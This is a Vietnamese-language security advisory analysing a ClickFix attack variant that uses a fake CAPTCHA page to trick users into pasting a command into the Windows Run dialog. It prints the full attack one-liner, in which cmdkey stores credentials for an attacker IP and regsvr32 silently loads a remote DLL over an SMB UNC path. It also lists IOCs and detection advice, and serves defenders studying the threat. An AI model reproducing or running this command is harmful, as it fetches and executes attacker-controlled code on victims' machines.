ClickFix attack phiên bản mới đã được ghi nhận trong môi trường thực tế, với thay đổi đáng chú ý là không còn dựa vào PowerShell. Thay vào đó, ClickFix attack chuỗi lệnh kết hợp trực tiếp các công cụ Windows hợp lệ như cmdkey và regsvr32 để tải và thực thi payload từ xa mà không ghi file xuống đĩa.
ClickFix attack: thay đổi kỹ thuật so với các chiến dịch trước
Ở các chiến dịch trước, kẻ tấn công thường dụ người dùng dán và chạy lệnh qua hộp thoại Windows Run, từ đó gọi PowerShell để tải và thực thi payload. Với biến thể này, ClickFix attack bỏ qua PowerShell, khiến các công cụ phát hiện dựa trên hành vi quen thuộc khó nhận diện hơn.
Chuỗi tấn công sử dụng Living off the Land Binaries (LOLBins), tức là các tiện ích sẵn có trong Windows. Cách tiếp cận này giúp ClickFix attack hòa lẫn vào hoạt động hệ thống bình thường và giảm dấu vết trên host.
Tham khảo thêm về kỹ thuật lạm dụng công cụ hợp lệ tại CISA.
Cách thức hoạt động của ClickFix attack
Chiến dịch bắt đầu khi người dùng truy cập một trang giả mạo màn hình kiểm tra CAPTCHA. Trang này hướng dẫn nạn nhân mở hộp thoại Win + R, dán lệnh đã được chuẩn bị sẵn và nhấn Enter. Chỉ một thao tác dán lệnh là đủ để kích hoạt toàn bộ chuỗi ClickFix attack.
Trong biến thể quan sát được, lệnh được gọi thông qua cmd.exe và thực hiện hai hành động chính:
- cmdkey lưu thông tin xác thực cho địa chỉ IP từ xa 151.245.195[.]142 với tên người dùng guest.
- regsvr32 tải âm thầm file demo.dll từ SMB share của kẻ tấn công qua đường dẫn UNC.
Một comment dạng REM có nội dung “I am not a robot” được chèn vào lệnh để đánh lạc hướng và làm cho thao tác trông giống bước xác minh hợp lệ.
Chuỗi lệnh trong ClickFix attack
cmd.exe /c cmdkey /add:151.245.195.142 /user:guest /pass:<password> & regsvr32 /s \\151.245.195.142\share\demo.dllTrong thực tế, ClickFix attack có thể thay đổi chi tiết tham số hoặc đường dẫn, nhưng điểm cốt lõi vẫn là sử dụng cmdkey và regsvr32 để tránh PowerShell và giảm tín hiệu phát hiện.
Hành vi sau khi DLL được nạp
Khi regsvr32 chạy DLL, export DllRegisterServer kích hoạt một lời gọi CreateProcessA ẩn, từ đó tạo một tác vụ theo lịch có tên RunNotepadNow qua Windows Task Scheduler. Điều đáng chú ý là định nghĩa của tác vụ không nằm sẵn trên máy bị nhiễm.
Thay vào đó, task được kéo từ một file XML từ xa trên máy chủ do kẻ tấn công kiểm soát. Cách làm này cho phép cập nhật payload giai đoạn sau mà không cần triển khai lại DLL ban đầu, đồng thời giữ cho ClickFix attack có khả năng bám trụ với rất ít dấu vết cục bộ.
Ảnh hưởng đến phát hiện và giám sát
Vì ClickFix attack chỉ sử dụng các công cụ tích hợp của Windows, những giải pháp tìm kiếm file thả xuống bất thường hoặc tiến trình lạ có thể không phát cảnh báo. Đây là điểm khiến các cơ chế phát hiện dựa trên chữ ký hoặc IOC đơn lẻ kém hiệu quả hơn.
Chuỗi tấn công cũng có thể vượt qua các kiểm soát giám sát thông thường nếu hệ thống không theo dõi chi tiết việc gọi cmd.exe, truy cập SMB/UNC, hoặc hành vi của regsvr32 khi tải DLL từ xa.
IOC liên quan đến ClickFix attack
- IP từ xa: 151.245.195[.]142
- Tên người dùng: guest
- DLL: demo.dll
- Tác vụ theo lịch: RunNotepadNow
- Hành vi: cmdkey lưu credential cho IP ngoài, regsvr32 tải DLL qua UNC path, task XML từ xa
- Giả mạo giao diện: trang CAPTCHA / bước xác minh “I am not a robot”
Điểm giám sát cần ưu tiên
Để phát hiện ClickFix attack, cần theo dõi các mẫu hành vi sau:
- cmdkey được dùng với địa chỉ IP bên ngoài.
- regsvr32 tải remote DLL qua đường dẫn UNC.
- Chuỗi thực thi qua cmd.exe có nhiều bước nối tiếp.
- Hoạt động Task Scheduler tham chiếu đến file XML từ xa.
- Lưu lượng SMB và truy cập UNC bất thường ra ngoài mạng nội bộ.
Khuyến nghị kiểm soát kỹ thuật
Cần hạn chế hoặc giám sát chặt lưu lượng SMB và truy cập UNC ở mức mạng. Đồng thời, các cảnh báo nên được cấu hình để bám theo chuỗi gọi lệnh hợp lệ nhưng bất thường trong ClickFix attack.
Giám sát nhận thức người dùng cũng quan trọng, vì mô hình tấn công dựa vào thao tác dán lệnh tự nguyện trong hộp thoại Run. Chỉ một lần paste một lệnh đã được nạp sẵn là đủ để kích hoạt ClickFix attack.
Tham chiếu kỹ thuật
Phân tích chi tiết về biến thể này được công bố trong tài liệu của CyberProof: Beyond PowerShell: Analyzing the Multi-Action ClickFix Variant.
